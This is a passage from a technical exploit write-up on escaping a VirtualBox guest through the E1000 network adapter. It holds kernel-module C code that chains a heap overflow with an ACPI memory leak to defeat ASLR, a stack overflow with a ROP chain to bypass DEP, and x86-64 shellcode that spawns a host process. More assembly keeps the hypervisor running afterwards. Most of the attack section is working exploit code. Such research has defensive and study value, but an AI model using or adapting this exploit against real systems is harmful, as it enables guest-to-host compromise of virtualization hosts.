It turns out that at offset 0x58 from the end of the ACPIState structure there is a pointer to a string that is located according to a certain RVA from the base VBoxDD.so. If we count this pointer by using primitives, and subtract a constant from it, we get the base address of VBoxDD.so and thus bypass ASLR. The only thing we have to hope for is that the memory outside the ACPIState structure will not be different each time the virtual machine starts. Fortunately, the way it turned out, at the offset 0x58 from the end of ACPIState is always the right pointer.


Information leaf


Now we combine the two vulnerabilities we have created and exploit them to bypass the ASLR. We will overflow the heap by rewriting the EEPROM93C46 structure, then we trim the EEPROM code to write the index into the ACPIState structure, and then execute the INB processor instruction (0x4107) to access the ACPI and read one pointer byte. All this is repeated eight times, each time increasing the index by one.


uint64_t stage_1_main(void* mmio, void* tx_ring) {
    printk(KERN_INFO PFX"##### Stage 1 #####\n");
    // When loopback mode is enabled data (network packets actually) of every Tx Data Descriptor 
    // is sent back to the guest and handled right now via e1kHandleRxPacket.
    // When loopback mode is disabled data is sent to a network as usual.
    // We disable loopback mode here, at Stage 1, to overflow the heap but not touch the stack buffer
    // in e1kHandleRxPacket. Later, at Stage 2 we enable loopback mode to overflow heap and 
    // the stack buffer.
    e1000_disable_loopback_mode(mmio);
    uint8_t leaked_bytes[8];
    uint32_t i;
    for (i = 0; i < 8; i++) {
        stage_1_overflow_heap_buffer(mmio, tx_ring, i);
        leaked_bytes[i] = stage_1_leak_byte();
        printk(KERN_INFO PFX"Byte %d leaked: 0x%02X\n", i, leaked_bytes[i]);
    }
    uint64_t leaked_vboxdd_ptr = *(uint64_t*)leaked_bytes;
    uint64_t vboxdd_base = leaked_vboxdd_ptr - LEAKED_VBOXDD_RVA;
    printk(KERN_INFO PFX"Leaked VBoxDD.so pointer: 0x%016llx\n", leaked_vboxdd_ptr);
    printk(KERN_INFO PFX"Leaked VBoxDD.so base: 0x%016llx\n", vboxdd_base);
    return vboxdd_base;
}

As mentioned earlier, in order for the integer underflow vulnerability not to lead to stack buffer overflow, you need to configure the E1000 registers in a certain way. The bottom line is that the buffer overflows in the e1kHandleRxPacket function, which is called when processing Tx-handles only when the loopback mode is on. And this is understandable: in this mode, the guest sends the packages to himself, so after sending they are immediately accepted. We disable this mode, so the e1kHandleRxPacket function becomes unreachable.


DEP bypass


We went around the ASLR. Now you can enable loopback mode and trigger the vulnerability of stack buffer overflow.


void stage_2_overflow_heap_and_stack_buffers(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    off_t buffer_pa;
    void* buffer_va;
    alloc_buffer(&buffer_pa, &buffer_va);
    stage_2_set_up_buffer(buffer_va, vboxdd_base);
    stage_2_trigger_overflow(mmio, tx_ring, buffer_pa);
    free_buffer(buffer_va);
}
void stage_2_main(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    printk(KERN_INFO PFX"##### Stage 2 #####\n");
    e1000_enable_loopback_mode(mmio);
    stage_2_overflow_heap_and_stack_buffers(mmio, tx_ring, vboxdd_base);
    e1000_disable_loopback_mode(mmio);
}

Now, when control reaches the last instruction of the e1kHandleRxPacket function, the return address is overwritten on the stack, so control will be transferred wherever we want. But DEP protection is still in place. It costs the classic way of building a chain of ROP gadgets that allocate executable memory, copy the shellcode loader into it and call it.


Shellcode


The shellcode loader is extremely simple. He copies the beginning of the buffer that caused the overflow, and puts it next to him. At the end of that buffer are the addresses and data for the ROP gadgets, and at the beginning - the shellcode itself.


use64
start:
    lea rsi, [rsp - 0x4170];
    push rax
    pop rdi
    add rdi, loader_size
    mov rcx, 0x800
    rep movsb
    nop
payload:
    ; Here the shellcode is to be
loader_size = $ - start

Now control gets shellcode. Here is his first half:


use64
start:
    ; sys_fork
    mov rax, 58
    syscall
    test rax, rax
    jnz continue_process_execution
    ; Initialize argv
    lea rsi, [cmd]
    mov [argv], rsi
    ; Initialize envp
    lea rsi, [env]
    mov [envp], rsi
    ; sys_execve
    lea rdi, [cmd]
    lea rsi, [argv]
    lea rdx, [envp]
    mov rax, 59
    syscall
...
cmd     db '/usr/bin/xterm', 0
env     db 'DISPLAY=:0.0', 0
argv    dq 0, 0
envp    dq 0, 0

It does fork and execve, which creates a new process / usr / bin / xtem. The attacker gains control of the host in the context of ring 3.


Process Continuation


I believe that every exploit should be completed to the end. This means that it should not crash the program, although it is clear that it is not always possible. We need a virtual machine to continue functioning, which is ensured by the second half of the shellcode.


continue_process_execution:
    ; Restore RBP
    mov rbp, rsp
    add rbp, 0x48
    ; Skip junk
    add rsp, 0x10
    ; Restore the registers that must be preserved according to System V ABI
    pop rbx
    pop r12
    pop r13
    pop r14
    pop r15
    ; Skip junk
    add rsp, 0x8
    ; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
    ; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
    ; After:    "E1000-Xmit" -> NULL
    ; Zero out the entire PDMQUEUE "Mouse_1" pointed by "E1000-Rcv"
    ; This was unnecessary on my testing machines but to be sure...
    mov rdi, [rbx]
    mov rax, 0x0
    mov rcx, 0xA0
    rep stosb
    ; NULL out a pointer to PDMQUEUE "E1000-Rcv" stored in "E1000-Xmit"
    ; because the first 8 bytes of "E1000-Rcv" (a pointer to "Mouse_1") 
    ; will be corrupted in MMHyperFree
    mov qword [rbx], 0x0
    ; Now the last PDMQUEUE is "E1000-Xmit" which will not be corrupted
    ret

The bottom line is that when the buffer overflowed on the stack, we overwritten a lot of data needed by the hypervisor to function when returning from the e1kHandleRxPacket function. Since there is no chance or expediency to calculate all the data that has been overwritten by ROP gadgets, we will do what is usually done: jump upwards by several frames and continue execution as if all the functions called have already completed.
Schematically, the call stack when returning from e1kHandleRxPacket looks like this:


#0 e1kHandleRxPacket
#1 e1kTransmitFrame
#2 e1kXmitDesc
#3 e1kXmitPacket
#4 e1kXmitPending
#5 e1kR3NetworkDown_XmitPending
...

From the shellcode, we will jump directly into e1kR3NetworkDown_XmitPending, which does nothing more and returns control to the hypervisor function that caused it:


static DECLCALLBACK(void) e1kR3NetworkDown_XmitPending(PPDMINETWORKDOWN pInterface)
{
    PE1KSTATE pThis = RT_FROM_MEMBER(pInterface, E1KSTATE, INetworkDown);
    /* Resume suspended transmission */
    STATUS &= ~STATUS_TXOFF;
    e1kXmitPending(pThis, true /*fOnWorkerThread*/);
}

The shellcode adds 0x48 to the RBP register so that it becomes what it should be in the e1kR3NetworkDown_XmitPending function. Now, RBX, R12, R13, R14 and R15 registers are taken from the stack, since according to the System V ABI, each called function must keep them intact. If this is not done, the hypervisor will fall due to invalid pointers in these registers.


You could stop at this - the virtual machine no longer crashes and continues to work normally. But if you try to turn it off, we get an access violation in PDMR3QueueDestroyDevice. The reason is that, when the heap overflowed, we overwritten the important data structure PDMQUEUE, and overwrite its last two pointers to ROP gadgets, i.e. last 16 bytes in buffer. At first I tried unsuccessfully to reduce the size of the ROP chain, but then I manually filled in the correct data in the debugger and still got crash. This means that you cannot get rid of the error quickly.


The data structure that is recycled is a linked list. Overwrites the data in the penultimate element of the list, modifying the pointer to the last element. The idea to fix the error was simple:


; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
; After:    "E1000-Xmit" -> NULL

Having gotten rid of the last two elements, the virtual machine can safely shut down.


Demo